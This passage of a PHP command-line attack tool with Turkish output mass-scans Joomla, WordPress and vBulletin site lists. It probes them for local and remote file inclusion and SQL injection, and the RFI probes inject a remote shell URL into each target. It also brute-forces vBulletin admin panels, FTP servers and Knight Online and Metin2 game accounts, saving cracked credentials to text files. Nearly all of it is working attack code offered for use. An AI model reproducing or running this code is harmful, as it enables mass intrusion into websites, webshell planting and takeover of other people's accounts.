751. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
752.  
753. ob_flush();
754. flush();
755.  
756. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_3);
757.  
758. }
759. if(eregi($this->lfiregex,$bak_4)){
760.  
761. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
762.  
763. ob_flush();
764. flush();
765.  
766. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_4);
767.  
768. }
769. if(eregi($this->lfiregex,$bak_5)){
770.  
771. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
772.  
773. ob_flush();
774. flush();
775.  
776. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_5);
777.  
778.  
779. }
780. if(eregi($this->lfiregex,$bak_6)){
781.  
782. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
783.  
784. ob_flush();
785. flush();
786.  
787. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_6);
788.  
789.  
790. }
791. if(eregi($this->lfiregex,$bak_7)){
792. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
793.  
794. ob_flush();
795. flush();
796.  
797. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_7);
798.  
799.  
800. }
801. if(eregi($this->lfiregex,$bak_8)){
802. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
803.  
804. ob_flush();
805. flush();
806.  
807. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_8);
808.  
809. }
810. if(eregi($this->lfiregex,$bak_9)){
811. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
812.  
813. ob_flush();
814. flush();
815.  
816. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_9);
817.  
818. }
819. if(eregi($this->lfiregex,$bak_10)){
820.  
821. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
822.  
823. ob_flush();
824. flush();
825.  
826. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_10);
827. }
828. if(eregi($this->lfiregex,$bak_11)){
829. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
830.  
831. ob_flush();
832. flush();
833.  
834. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_11);
835.  
836. }
837.  
838.  
839. }
840.  
841. echo "\nJoomla LFI Aramasi bitti";
842.  
843. }
844. public function jomrfi(){
845. $explode = explode("\n",file_get_contents("joomla.txt"));
846.  
847. foreach($explode as $sites){
848.  
849. $sites=trim($sites);
850. $bak_1 = self::curl($sites.$this->rfi_1.$this->shell);
851. $bak_2 = self::curl($sites.$this->rfi_2.$this->shell);
852. $bak_3 = self::curl($sites.$this->rfi_3.$this->shell);
853. $bak_4 = self::curl($sites.$this->rfi_4.$this->shell);
854. $bak_5 = self::curl($sites.$this->rfi_5.$this->shell);
855. $bak_6 = self::curl($sites.$this->rfi_6.$this->shell);
856. $bak_7 = self::curl($sites.$this->rfi_7.$this->shell);
857. $bak_8 = self::curl($sites.$this->rfi_8.$this->shell);
858. $bak_9 = self::curl($sites.$this->rfi_9.$this->shell);
859. $bak_10 = self::curl($sites.$this->rfi_10.$this->shell);
860. $bak_11 = self::curl($sites.$this->rfi_11.$this->shell);
861. $bak_12 = self::curl($sites.$this->rfi_12.$this->shell);
862. $bak_13 = self::curl($sites.$this->rfi_13.$this->shell);
863. $bak_14 = self::curl($sites.$this->rfi_14.$this->shell);
864. $bak_15 = self::curl($sites.$this->rfi_15.$this->shell);
865. $bak_16 = self::curl($sites.$this->rfi_16.$this->shell);
866. $bak_17 = self::curl($sites.$this->rfi_17.$this->shell);
867. $bak_18 = self::curl($sites.$this->rfi_18.$this->shell);
868. $bak_19 = self::curl($sites.$this->rfi_19.$this->shell);
869. $bak_20 = self::curl($sites.$this->rfi_20.$this->shell);
870. $bak_21 = self::curl($sites.$this->rfi_21.$this->shell);
871.  
872.  
873. if(eregi($this->shellkey,$bak_1)){
874.  
875. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
876. ob_flush();
877. flush();
878.  
879. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_1.$this->shell);
880.  
881. }
882. if(eregi($this->shellkey,$bak_2)){
883.  
884. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
885. ob_flush();
886. flush();
887.  
888. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_2.$this->shell);
889.  
890. }
891. if(eregi($this->shellkey,$bak_3)){
892.  
893. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
894. ob_flush();
895. flush();
896.  
897. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_3.$this->shell);
898.  
899. }
900. if(eregi($this->shellkey,$bak_4)){
901.  
902. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
903. ob_flush();
904. flush();
905.  
906. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_4.$this->shell);
907.  
908. }
909. if(eregi($this->shellkey,$bak_5)){
910.  
911. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
912. ob_flush();
913. flush();
914.  
915. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_5.$this->shell);
916.  
917. }
918. if(eregi($this->shellkey,$bak_6)){
919.  
920. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
921. ob_flush();
922. flush();
923.  
924. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_6.$this->shell);
925.  
926. }
927. if(eregi($this->shellkey,$bak_7)){
928.  
929. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
930. ob_flush();
931. flush();
932.  
933. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_7.$this->shell);
934.  
935. }
936. if(eregi($this->shellkey,$bak_8)){
937.  
938. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
939. ob_flush();
940. flush();
941.  
942. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_8.$this->shell);
943.  
944. }
945. if(eregi($this->shellkey,$bak_9)){
946.  
947. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
948. ob_flush();
949. flush();
950.  
951. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_9.$this->shell);
952.  
953. }
954. if(eregi($this->shellkey,$bak_10)){
955.  
956. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
957. ob_flush();
958. flush();
959.  
960. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_10.$this->shell);
961.  
962. }
963. if(eregi($this->shellkey,$bak_11)){
964.  
965. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
966. ob_flush();
967. flush();
968.  
969. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_11.$this->shell);
970.  
971. }
972. if(eregi($this->shellkey,$bak_12)){
973.  
974. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
975. ob_flush();
976. flush();
977.  
978. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_12.$this->shell);
979.  
980. }
981. if(eregi($this->shellkey,$bak_13)){
982.  
983. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
984. ob_flush();
985. flush();
986.  
987. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_13.$this->shell);
988.  
989. }
990. if(eregi($this->shellkey,$bak_14)){
991.  
992. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
993. ob_flush();
994. flush();
995.  
996. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_14.$this->shell);
997.  
998. }
999. if(eregi($this->shellkey,$bak_15)){
1000.  
1001. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
1002. ob_flush();
1003. flush();
1004.  
1005. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_15.$this->shell);
1006.  
1007. }
1008. if(eregi($this->shellkey,$bak_16)){
1009.  
1010. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
1011. ob_flush();
1012. flush();
1013.  
1014. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_16.$this->shell);
1015.  
1016. }
1017. if(eregi($this->shellkey,$bak_17)){
1018.  
1019. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
1020. ob_flush();
1021. flush();
1022.  
1023. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_17.$this->shell);
1024.  
1025. }
1026. if(eregi($this->shellkey,$bak_18)){
1027.  
1028. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
1029. ob_flush();
1030. flush();
1031.  
1032. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_18.$this->shell);
1033.  
1034. }
1035. if(eregi($this->shellkey,$bak_19)){
1036.  
1037. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
1038. ob_flush();
1039. flush();
1040.  
1041. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_19.$this->shell);
1042.  
1043. }
1044. if(eregi($this->shellkey,$bak_20)){
1045.  
1046. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
1047. ob_flush();
1048. flush();
1049.  
1050. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_20.$this->shell);
1051.  
1052. }
1053. if(eregi($this->shellkey,$bak_21)){
1054.  
1055. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
1056. ob_flush();
1057. flush();
1058.  
1059. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_21.$this->shell);
1060.  
1061. }
1062.  
1063. }
1064.  
1065. echo "\nJoomla RFI Aramasi bitti";
1066.  
1067. }
1068.  
1069. public function wprfi(){
1070. $explode = explode("\n",file_get_contents("wordpress.txt"));
1071. foreach($explode as $sites){
1072.  
1073. $sites = trim($sites);
1074. $bak_1 = self::curl($sites.$this->wprfi_1.$this->shell);
1075. $bak_2 = self::curl($sites.$this->wprfi_2.$this->shell);
1076. $bak_3 = self::curl($sites.$this->wprfi_3.$this->shell);
1077. $bak_4 = self::curl($sites.$this->wprfi_4.$this->shell);
1078. $bak_5 = self::curl($sites.$this->wprfi_5.$this->shell);
1079. $bak_6 = self::curl($sites.$this->wprfi_6.$this->shell);
1080. $bak_7 = self::curl($sites.$this->wprfi_7.$this->shell);
1081. $bak_8 = self::curl($sites.$this->wprfi_8.$this->shell);
1082. $bak_9 = self::curl($sites.$this->wprfi_9.$this->shell);
1083. $bak_10 = self::curl($sites.$this->wprfi_10.$this->shell);
1084.  
1085. if(eregi($this->shellkey,$bak_1)){
1086.  
1087. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
1088. ob_flush();
1089. flush();
1090.  
1091. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_1.$this->shell);
1092.  
1093. }
1094. if(eregi($this->shellkey,$bak_2)){
1095.  
1096. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
1097. ob_flush();
1098. flush();
1099.  
1100. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_2.$this->shell);
1101.  
1102. }
1103. if(eregi($this->shellkey,$bak_3)){
1104.  
1105. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
1106. ob_flush();
1107. flush();
1108.  
1109. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_3.$this->shell);
1110.  
1111. }
1112. if(eregi($this->shellkey,$bak_4)){
1113.  
1114. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
1115. ob_flush();
1116. flush();
1117.  
1118. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_4.$this->shell);
1119.  
1120. }
1121. if(eregi($this->shellkey,$bak_5)){
1122.  
1123. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
1124. ob_flush();
1125. flush();
1126.  
1127. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_5.$this->shell);
1128.  
1129. }
1130. if(eregi($this->shellkey,$bak_6)){
1131.  
1132. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
1133. ob_flush();
1134. flush();
1135.  
1136. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_6.$this->shell);
1137.  
1138. }
1139. if(eregi($this->shellkey,$bak_7)){
1140.  
1141. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
1142. ob_flush();
1143. flush();
1144.  
1145. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_7.$this->shell);
1146.  
1147. }
1148. if(eregi($this->shellkey,$bak_8)){
1149.  
1150. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
1151. ob_flush();
1152. flush();
1153.  
1154. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_8.$this->shell);
1155.  
1156. }
1157. if(eregi($this->shellkey,$bak_9)){
1158.  
1159. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
1160. ob_flush();
1161. flush();
1162.  
1163. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_9.$this->shell);
1164.  
1165. }
1166. if(eregi($this->shellkey,$bak_10)){
1167.  
1168. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
1169. ob_flush();
1170. flush();
1171.  
1172. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_10.$this->shell);
1173.  
1174. }
1175.  
1176.  
1177. }
1178.  
1179. echo "\nWordpress RFI Aramasi bitti";
1180.  
1181. }
1182.  
1183. public function vbrute_1($url){
1184.  
1185. $curl = curl_init();
1186. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
1187. curl_setopt($curl,CURLOPT_URL,$url.$this->url_7);
1188. curl_setopt($curl,CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
1189. curl_setopt($curl,CURLOPT_COOKIEJAR, 'vbcookie.txt');
1190. curl_setopt($curl,CURLOPT_COOKIEFILE, 'vbcookie.txt');
1191. $exec=curl_exec($curl);
1192. curl_close($curl);
1193. return $exec;
1194.  
1195. }
1196. public function vbrute_2(){
1197.  
1198. $password = explode("\n",file_get_contents($this->wordlist));
1199. foreach($password as $passwords){
1200. $passwords=trim($passwords);
1201. $passwords=md5($passwords);
1202.  
1203. $explode = explode("\n",file_get_contents("vbulletin.txt"));
1204.  
1205. foreach($explode as $sites){
1206.  
1207. $sites = trim($sites);
1208.  
1209. $hash = self::vbhashAl($sites);
1210.  
1211. $url = $sites.$this->url_8;
1212.  
1213. $curl=curl_init();
1214. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
1215. curl_setopt($curl,CURLOPT_URL,$url);
1216. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
1217. curl_setopt($curl,CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
1218. curl_setopt($curl,CURLOPT_COOKIEJAR, 'vbcookie.txt');
1219. curl_setopt($curl,CURLOPT_COOKIEFILE, 'vbcookie.txt');
1220. curl_setopt($curl,CURLOPT_POST,1);
1221. curl_setopt($curl,CURLOPT_POSTFIELDS,'url=%2Fadmincp%2F&s='.$hash.'&securitytoken=guest&logintype=cplogin&do=login&vb_login_md5password='.$passwords.'&vb_login_md5password_utf='.$passwords.'&vb_login_username=Admin&vb_login_password=&cssprefs=');
1222. curl_setopt($curl,CURLOPT_TIMEOUT,25);
1223. $exec=curl_exec($curl);
1224. curl_close($curl);
1225. if(eregi($this->vbreg,$exec)){
1226.  
1227. echo $sites." -> vBulletin Panel Girisi bulundu vbrute.txt\n";
1228. ob_flush();
1229. flush();
1230.  
1231. $kaydet=self::kaydet("vbrute.txt",$sites.$this->url_7);
1232.  
1233. }
1234.  
1235. }
1236.  
1237.  
1238.  
1239. }
1240. @unlink("vbcookie.txt");
1241. echo "\nvBulletin Brute Force bitti.";
1242.  
1243. }
1244. public function vbhashAl($url){
1245. $adres=self::vbrute_1($url);
1246. preg_match_all($this->vbregex,$adres,$s);
1247. return $s[1][0];
1248. }
1249.  
1250. public function datasql(){
1251.  
1252. $explode = explode("\n",file_get_contents("vbulletin.txt"));
1253.  
1254. foreach($explode as $siteler){
1255.  
1256. $siteler = trim($siteler);
1257.  
1258. $login = self::curl($siteler.$this->url_9);
1259.  
1260. if(eregi($this->datareg,$login)){
1261.  
1262. echo $siteler." -> vBulletin Data SQL Bulundu datasql.txt\n";
1263.  
1264. ob_flush();
1265. flush();
1266.  
1267. $kaydet = self::kaydet("datasql.txt",$siteler.$this->url_9);
1268.  
1269. }
1270.  
1271.  
1272. }
1273. echo "\nvBulletin Data SQL Arama bitti";
1274.  
1275. }
1276. public function pagerank(){
1277.  
1278. $explode = explode("\n",file_get_contents("reverse.txt"));
1279.  
1280. foreach($explode as $siteler){
1281.  
1282. $siteler = trim($siteler);
1283.  
1284. $curl=curl_init();
1285. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
1286. curl_setopt($curl,CURLOPT_URL,'http://www.developertutorials.com/tools/google-pagerank-checker.php');
1287. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 ( .NET CLR 3.5.30729; .NET4.0E)');
1288. curl_setopt($curl,CURLOPT_POST,1);
1289. curl_setopt($curl,CURLOPT_POSTFIELDS,'url='.$siteler.'&Submit1=Get+PageRank');
1290.  
1291. $exec=curl_exec($curl);
1292. curl_close($curl);
1293.  
1294. $regex = "#<font color='(.*?)'>(.*?)</font>#";
1295.  
1296. preg_match_all($regex,$exec,$pr);
1297. foreach($pr[0] as $pagerank){
1298.  
1299. $pagerank = ereg_replace("<font color='#006600'>Google PageRank ","",$pagerank);
1300. $pagerank = ereg_replace("</font>","",$pagerank);
1301.  
1302. echo $siteler." Pagerank ".$pagerank."\n";
1303. ob_flush();
1304. flush();
1305. }
1306.  
1307. }
1308.  
1309. echo "\nPagerank Check bitti.";
1310.  
1311. }
1312. public function sqlinj(){
1313.  
1314. $explode = explode("\n",file_get_contents("reverse.txt"));
1315.  
1316. foreach($explode as $sites){
1317. $sites=trim($sites);
1318.  
1319. $gir = self::curl($sites);
1320.  
1321. preg_match_all($this->sql,$gir,$link);
1322.  
1323. foreach($link[0] as $links){
1324.  
1325. if(eregi('id=',$links)){
1326.  
1327. $url = $links."%27";
1328.  
1329. $login = self::curl($url);
1330.  
1331. if(eregi($this->hata[0],$login)){
1332. echo $sites." -> SQL Syntax bulundu sql.txt\n";
1333.  
1334. ob_flush();
1335. flush();
1336. $kaydet = self::kaydet("sql.txt",$url);
1337. }elseif(eregi($this->hata[1],$login)){
1338. echo $sites." -> MySQL bulundu sql.txt\n";
1339.  
1340. ob_flush();
1341. flush();
1342. $kaydet = self::kaydet("sql.txt",$url);
1343. }elseif(eregi($this->hata[2],$login)){
1344. echo $sites." -> MySQL bulundu sql.txt\n";
1345.  
1346. ob_flush();
1347. flush();
1348. $kaydet = self::kaydet("sql.txt",$url);
1349. }elseif(eregi($this->hata[3],$login)){
1350. echo $sites." -> MySQL bulundu sql.txt\n";
1351.  
1352. ob_flush();
1353. flush();
1354. $kaydet = self::kaydet("sql.txt",$url);
1355. }elseif(eregi($this->hata[4],$login)){
1356. echo $sites." -> Unclosed bulundu sql.txt\n";
1357.  
1358. ob_flush();
1359. flush();
1360. $kaydet = self::kaydet("sql.txt",$url);
1361. }
1362.  
1363.  
1364. }
1365.  
1366. }
1367.  
1368. }
1369. echo "\nSQL Taramasi bitti.";
1370. }
1371.  
1372. public function ftpbrute($site){
1373.  
1374. if(!file_exists("ftp_user.txt")){
1375. echo "\nLutfen ftp_user.txt ye user listinizi girin";
1376. exit;
1377. }elseif(!file_exists("ftp_pass.txt")){
1378. echo "\nLutfen ftp_pass.txt ye pass listinizi girin";
1379. exit;
1380. }
1381.  
1382.  
1383. $users = explode("\n",file_get_contents("ftp_user.txt"));
1384. $pass = explode("\n",file_get_contents("ftp_pass.txt"));
1385.  
1386. foreach($users as $username){
1387. $username = trim($username);
1388.  
1389. foreach($pass as $password){
1390. $password = trim($password);
1391.  
1392.  
1393. $curl = curl_init();
1394. curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1395. curl_setopt($curl, CURLOPT_URL, 'ftp://'.$username.':'.$password.'@'.$site.'');
1396. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
1397. curl_setopt($curl, CURLOPT_FTPLISTONLY,1);
1398. curl_setopt($curl, CURLOPT_TIMEOUT,15);
1399. $exec = curl_exec($curl);
1400. curl_close($curl);
1401.  
1402. if(curl_errno($curl)==0){
1403. echo "Username : ".$username." Password : ".$password." -> FTP Kirildi ftpcracked.txt\n";
1404. ob_flush();
1405. flush();
1406.  
1407. $kaydet = self::kaydet("ftpcracked.txt","ftp://".$site." User : ".$username." Pass : ".$password."");
1408. }
1409.  
1410. }
1411.  
1412. }
1413.  
1414.  
1415. echo "\nFTP Kirma islemi bitti";
1416.  
1417. }
1418.  
1419.  
1420.  
1421. public function kobrute(){
1422.  
1423. if(!file_exists("ko_user.txt")){
1424. echo "\nLutfen ko_user.txt ye user listinizi girin";
1425. exit;
1426. }elseif(!file_exists("ko_pass.txt")){
1427. echo "\nLutfen ko_pass.txt ye pass listinizi girin";
1428. exit;
1429. }
1430. $userler = explode("\n",file_get_contents("ko_user.txt"));
1431. $passlar = explode("\n",file_get_contents("ko_pass.txt"));
1432.  
1433.  
1434. foreach($userler as $users){
1435. $users = trim($users);
1436.  
1437. foreach($passlar as $passes){
1438.  
1439. $curl=curl_init();
1440. curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
1441. curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
1442. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
1443. curl_setopt($curl,CURLOPT_HEADER,0);
1444. curl_setopt($curl,CURLOPT_URL,'https://gamersfirst.ekolay.net/action/login.php');
1445. curl_setopt($curl,CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)");
1446. curl_setopt($curl,CURLOPT_COOKIEJAR,'kocookie.txt');
1447. curl_setopt($curl,CURLOPT_COOKIEFILE,'kocookie.txt');
1448. curl_setopt($curl,CURLOPT_POST,1);
1449. curl_setopt($curl,CURLOPT_POSTFIELDS,'successRedirectUrl=%2F&failureRedirectUrl=%2Flogin.php%3Fretry&loginuser='.$users.'&loginpass='.$passes.'&loginsubmit=');
1450. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
1451. curl_setopt($curl,CURLOPT_TIMEOUT,10);
1452.  
1453. $run=curl_exec($curl);
1454. curl_close($curl);
1455.  
1456. if(eregi('logout.php',$run)){
1457. echo "Username : ".$users." Password : ".$passes." -> Account Kirildi kocrack.txt\n";
1458.  
1459. ob_flush();
1460. flush();
1461.  
1462. $kaydet = self::kaydet("kocrack.txt","Username : ".$users." Password : ".$passes."");
1463. }
1464.  
1465. }
1466. }
1467.  
1468. @unlink("kocookie.txt");
1469. echo "\nKnight OnLine Crack islemi bitti";
1470.  
1471. }
1472.  
1473. public function metinbrute(){
1474.  
1475. if(!file_exists("metin_user.txt")){
1476. echo "\nLutfen metin_user.txt ye user listinizi girin";
1477. exit;
1478. }elseif(!file_exists("metin_pass.txt")){
1479. echo "\nLutfen metin_pass.txt ye pass listinizi girin";
1480. exit;
1481. }
1482.  
1483. $userler = explode("\n",file_get_contents("metin_user.txt"));
1484. $passlar = explode("\n",file_get_contents("metin_pass.txt"));
1485.  
1486. foreach($userler as $users){
1487.  
1488. $users = trim($users);
1489.  
1490. foreach($passlar as $passes){
1491. $passes = trim($passes);
1492.  
1493. $curl = curl_init();
1494. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
1495. curl_setopt($curl,CURLOPT_URL,"http://www.metin2.org/user/login");
1496. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 ( .NET CLR 3.5.30729; .NET4.0E)');
1497. curl_setopt($curl,CURLOPT_COOKIEJAR,"metincookie.txt");
1498. curl_setopt($curl,CURLOPT_COOKIEFILE,"metincookie.txt");
1499. curl_setopt($curl,CURLOPT_POST,1);
1500. curl_setopt($curl,CURLOPT_POSTFIELDS,"username=".$users."&password=".$passes."");
1501. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
1502.  
1503. $run = curl_exec($curl);
1504. curl_close($curl);
1505. if(eregi("Hesap Bilgileri",$run)){
1506. echo "Username : ".$users." Password : ".$passes." -> Account Kirildi metincrack.txt\n";
1507. ob_flush();
1508. flush();
1509.  
1510. $kaydet = self::kaydet("metincrack.txt","Username : ".$users." Password : ".$passes."");
1511. }
1512.  
1513. }
1514.  
1515. }
1516. @unlink("metincookie.txt");
1517. echo "\nMetin2 Crack islemi bitti";
1518.  
1519.  
1520. }
1521.  
1522. }
1523.  
1524.  
1525.  
1526.  
1527.  
1528. $tool=new H_Tool();
1529. if($argv[1]==""){
1530.  
1531. $tool->ana();
1532.  
1533. }
1534. if($argv[1]=="komutlar"){
1535. $tool->komutlar();
1536. }
1537. if($argv[1]){
1538. $tool->reverse($argv[1]);
1539. }
1540. if($argv[1]=="ayir"){
1541. echo "\nAraniyor Bekleyin...\n\n";
1542. ob_flush();
1543. flush();
1544. $tool->ayir();
1545. }
1546. if($argv[1]=="jomtoken"){
1547. echo "\nJoomla Token Taraniyor bekleyin\n\n";
1548. ob_flush();
1549. flush();
1550. $tool->token_2();
1551. }
1552. if($argv[1]=="jombrute"){
1553. echo "\nJoomla Brute Force basladi bekleyin\n\n";
1554. ob_flush();
1555. flush();
1556.  
1557. $tool->jombrute_2();
1558. }
1559. if($argv[1]=="wpbrute"){
1560. echo "\nWordpress Brute Forcer basladi bekleyin\n\n";
1561. ob_flush();
1562. flush();
1563.  
1564. $tool->wpbrute();
1565. }
1566. if($argv[1]=="osreset"){
1567. echo "\nosCommerce admin reset deneniyor...\n\n";
1568. ob_flush();
1569. flush();
1570.  
1571. $tool->osc_login();
1572. }
1573. if($argv[1]=="shellara"){
1574. echo "\nShell arama basladi...\n\n";
1575. ob_flush();
1576. flush();
1577.  
1578. $tool->shellara();
1579. }
1580. if($argv[1]=="jomsql"){
1581. echo "\nJoomla SQL Injection Araniyor...\n\n";
1582. ob_flush();
1583. flush();
1584.  
1585. $tool->jomsql();
1586.  
1587. }
1588. if($argv[1]=="wpsql"){
1589. echo "\nWordpress SQL Injection Araniyor...\n\n";
1590. ob_flush();
1591. flush();
1592.  
1593. $tool->wpsql();
1594. }
1595. if($argv[1]=="jomlfi"){
1596. echo "\nJoomla LFI Araniyor...\n\n";
1597. ob_flush();
1598. flush();
1599.  
1600. $tool->jomlfi();
1601.  
1602. }
1603. if($argv[1]=="jomrfi"){
1604. echo "\nJoomla RFI Araniyor...\n\n";
1605. ob_flush();
1606. flush();
1607.  
1608. $tool->jomrfi();
1609.  
1610. }
1611. if($argv[1]=="wprfi"){
1612. echo "\nWordpress RFI Araniyor...\n\n";
1613. ob_flush();
1614. flush();
1615.  
1616. $tool->wprfi();
1617. }
1618. if($argv[1]=="vbrute"){
1619. echo "\nvBulletin Brute Force basladi...\n\n";
1620. ob_flush();
1621. flush();
1622.  
1623. $tool->vbrute_2();
1624. }
1625. if($argv[1]=="datasql"){
1626. echo "\nvBulletin Data SQL Aramasi basladi...\n\n";
1627.  
1628. ob_flush();
1629. flush();
1630.  
1631. $tool->datasql();
1632. }
1633. if($argv[1]=="pagerank"){
1634.  
1635. echo "\nPagerank Check basladi...\n\n";
1636. ob_flush();
1637. flush();
1638.  
1639. $tool->pagerank();
1640. }
1641. if($argv[1]=="sqlinj"){
1642. echo "\nSQL Injection Taramasi basladi...\n\n";
1643. ob_flush();
1644. flush();
1645.  
1646. $tool->sqlinj();
1647. }
1648. if($argv[1]=="ftpbrute"){
1649. echo "\nFTP Kirma islemi basladi...\n\n";
1650. ob_flush();
1651. flush();
1652.  
1653. $tool->ftpbrute($argv[2]);
1654. }
1655. if($argv[1]=="kobrute"){
1656. echo "\nKnight OnLine Crack islemi basladi...\n\n";
1657. ob_flush();
1658. flush();
1659.  
1660. $tool->kobrute();
1661. }
1662. if($argv[1]=="metinbrute"){
1663. echo "\nMetin2 Crack islemi basladi...\n\n";
1664. ob_flush();
1665. flush();
1666.  
1667. $tool->metinbrute();
1668. }
1669. ?>